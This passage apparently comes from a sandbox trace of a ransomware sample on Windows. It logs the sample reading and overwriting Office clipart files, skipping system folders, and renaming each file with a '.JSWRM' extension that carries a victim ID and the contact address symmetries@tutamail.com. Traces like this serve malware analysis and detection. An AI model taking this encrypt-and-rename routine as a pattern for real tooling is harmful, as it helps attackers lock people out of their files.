(normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.582] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12824) returned 1 [0092.582] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3210) returned 0x24d210 [0092.582] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3210, lpOverlapped=0x0) returned 1 [0092.585] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.585] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3210, lpOverlapped=0x0) returned 1 [0092.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.585] CloseHandle (hObject=0x314) returned 1 [0092.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0092.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0092.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0092.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0092.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0092.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.585] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02441_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02441_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0092.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.586] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x55c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02443_.WMF", cAlternateFileName="")) returned 1 [0092.586] lstrcmpiW (lpString1="NA02443_.WMF", lpString2=".") returned 1 [0092.586] lstrcmpiW (lpString1="NA02443_.WMF", lpString2="..") returned 1 [0092.586] lstrcmpiW (lpString1="NA02443_.WMF", lpString2="...") returned 1 [0092.586] lstrcmpiW (lpString1="NA02443_.WMF", lpString2="windows") returned -1 [0092.586] lstrcmpiW (lpString1="NA02443_.WMF", lpString2="recovery") returned -1 [0092.586] lstrcmpiW (lpString1="NA02443_.WMF", lpString2="perflogs") returned -1 [0092.586] lstrcmpiW (lpString1="NA02443_.WMF", lpString2="documents and settings") returned 1 [0092.587] lstrcmpiW (lpString1="NA02443_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.587] lstrcmpiW (lpString1="NA02443_.WMF", lpString2="system volume information") returned -1 [0092.587] lstrcmpiW (lpString1="NA02443_.WMF", lpString2="msocache") returned 1 [0092.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0092.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02443_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02443_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02443_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0092.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0092.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02443_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02443_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02443_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0092.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.588] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1372) returned 1 [0092.588] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x550) returned 0x2323e8 [0092.588] ReadFile (in: hFile=0x314, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x550, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x550, lpOverlapped=0x0) returned 1 [0092.589] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.590] WriteFile (in: hFile=0x314, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x550, lpOverlapped=0x0) returned 1 [0092.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2323e8 | out: hHeap=0x1e0000) returned 1 [0092.590] CloseHandle (hObject=0x314) returned 1 [0092.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0092.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0092.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0092.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0092.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0092.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.590] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02443_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02443_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0092.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.591] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x88c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02444_.WMF", cAlternateFileName="")) returned 1 [0092.591] lstrcmpiW (lpString1="NA02444_.WMF", lpString2=".") returned 1 [0092.591] lstrcmpiW (lpString1="NA02444_.WMF", lpString2="..") returned 1 [0092.591] lstrcmpiW (lpString1="NA02444_.WMF", lpString2="...") returned 1 [0092.591] lstrcmpiW (lpString1="NA02444_.WMF", lpString2="windows") returned -1 [0092.591] lstrcmpiW (lpString1="NA02444_.WMF", lpString2="recovery") returned -1 [0092.591] lstrcmpiW (lpString1="NA02444_.WMF", lpString2="perflogs") returned -1 [0092.591] lstrcmpiW (lpString1="NA02444_.WMF", lpString2="documents and settings") returned 1 [0092.591] lstrcmpiW (lpString1="NA02444_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.591] lstrcmpiW (lpString1="NA02444_.WMF", lpString2="system volume information") returned -1 [0092.591] lstrcmpiW (lpString1="NA02444_.WMF", lpString2="msocache") returned 1 [0092.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02444_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02444_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02444_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02444_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02444_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02444_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.592] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2188) returned 1 [0092.592] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x880) returned 0x20c6c0 [0092.592] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x880, lpOverlapped=0x0) returned 1 [0092.596] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.596] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x880, lpOverlapped=0x0) returned 1 [0092.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0092.596] CloseHandle (hObject=0x314) returned 1 [0092.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0092.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0092.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0092.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0092.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.597] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02444_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02444_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.598] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa34, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02446_.WMF", cAlternateFileName="")) returned 1 [0092.598] lstrcmpiW (lpString1="NA02446_.WMF", lpString2=".") returned 1 [0092.598] lstrcmpiW (lpString1="NA02446_.WMF", lpString2="..") returned 1 [0092.598] lstrcmpiW (lpString1="NA02446_.WMF", lpString2="...") returned 1 [0092.598] lstrcmpiW (lpString1="NA02446_.WMF", lpString2="windows") returned -1 [0092.598] lstrcmpiW (lpString1="NA02446_.WMF", lpString2="recovery") returned -1 [0092.598] lstrcmpiW (lpString1="NA02446_.WMF", lpString2="perflogs") returned -1 [0092.598] lstrcmpiW (lpString1="NA02446_.WMF", lpString2="documents and settings") returned 1 [0092.598] lstrcmpiW (lpString1="NA02446_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.598] lstrcmpiW (lpString1="NA02446_.WMF", lpString2="system volume information") returned -1 [0092.598] lstrcmpiW (lpString1="NA02446_.WMF", lpString2="msocache") returned 1 [0092.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02446_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02446_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02446_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0092.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02446_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02446_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02446_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0092.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02446_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.599] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2612) returned 1 [0092.599] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa30) returned 0x20c6c0 [0092.599] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa30, lpOverlapped=0x0) returned 1 [0092.601] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.601] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa30, lpOverlapped=0x0) returned 1 [0092.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0092.601] CloseHandle (hObject=0x314) returned 1 [0092.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 